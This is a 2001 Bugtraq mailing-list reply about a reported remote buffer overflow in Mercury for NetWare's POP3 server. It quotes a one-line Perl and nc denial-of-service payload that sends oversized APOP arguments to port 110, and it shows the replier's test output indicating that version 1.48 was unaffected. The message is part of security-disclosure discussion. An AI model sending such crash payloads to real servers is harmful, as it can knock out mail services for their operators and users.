[20385] in bugtraq
Re: Mercury for NetWare POP3 server vulnerable to remote buffer
daemon@ATHENA.MIT.EDU (Adam Osuchowski)
Mon Apr 23 14:04:50 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <200104221833.UAA16212@zeus.polsl.gliwice.pl>
Date: Sun, 22 Apr 2001 20:33:28 +0200
Reply-To: Adam Osuchowski <adwol@polsl.gliwice.pl>
From: Adam Osuchowski <adwol@polsl.gliwice.pl>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010421105215.A18021@riget.scene.pl>; from
venglin@FREEBSD.LUBLIN.PL on Sat, Apr 21, 2001 at 10:52:15AM +0200
Przemyslaw Frasunek wrote:
> All versions of widely-used POP3 server from Mercury MTA package for Netware
> are vulnerable to remote buffer overflow allowing to crash Netware server:
>
> perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
On my copy of MercuryP/NLM 1.48 it doesn't work:
$ perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc xxx.yyy.zzz 110
+OK <105950536.4821@xxx.yyy.zzz>, MercuryP/NLM v1.48 ready.
-ERR Too many failures - try again later.
$ telnet xxx.yyy.zzz 110
Trying...
Connected to xxx.yyy.zzz.
Escape character is '^]'.
+OK <105952409.20153@xxx.yyy.zzz>, MercuryP/NLM v1.48 ready.
--
## Adam Osuchowski adwol@polsl.gliwice.pl, adwol@silesia.linux.org.pl
## Silesian University of Technology, Computer Centre Gliwice, Poland
